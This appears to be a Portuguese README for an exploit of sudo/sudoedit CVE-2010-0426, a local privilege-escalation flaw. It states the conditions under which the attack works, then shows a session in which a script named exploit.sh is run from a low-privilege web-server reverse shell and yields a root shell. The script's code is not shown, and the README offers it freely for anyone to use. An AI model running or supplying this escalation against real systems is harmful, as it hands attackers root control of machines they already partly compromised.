
sudo 1.6.x anteriores a 1.6.9p21 e 1.7.x anteriores a 1.7.2p4 - Escalação de privilégios com sudo e sudoedit
https://www.cvedetails.com/cve/CVE-2010-0426/
sudo 1.6.x anterior a 1.6.9p21 e 1.7.x anterior a 1.7.2p4, quando um pseudo-comando está habilitado, permite uma correspondência entre o nome do pseudo-comando e o nome de um arquivo executável em um diretório arbitrário, o que permite que usuários locais obtenham privilégios por meio de um arquivo executável manipulado, conforme demonstrado por um arquivo chamado sudoedit no diretório home de um usuário.
Escalar privilégios quando o binário sudoedit tem permissão suid e um arquivo pode ser editado como sudo (verifique com sudo -l)
./exploit.sh
Escalar para root a partir de um revshell de baixo privilégio
www-data@g1vi:/var/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@g1vi:/var/tmp$ ./exploit.sh
[+] Target is vulnerable
[+] Running stuff...
root@g1vi:/var/tmp$ id
uid=0(root) gid=0(root) groups=0(root)
Sinta-se livre para usar ou modificar sempre e onde quiser.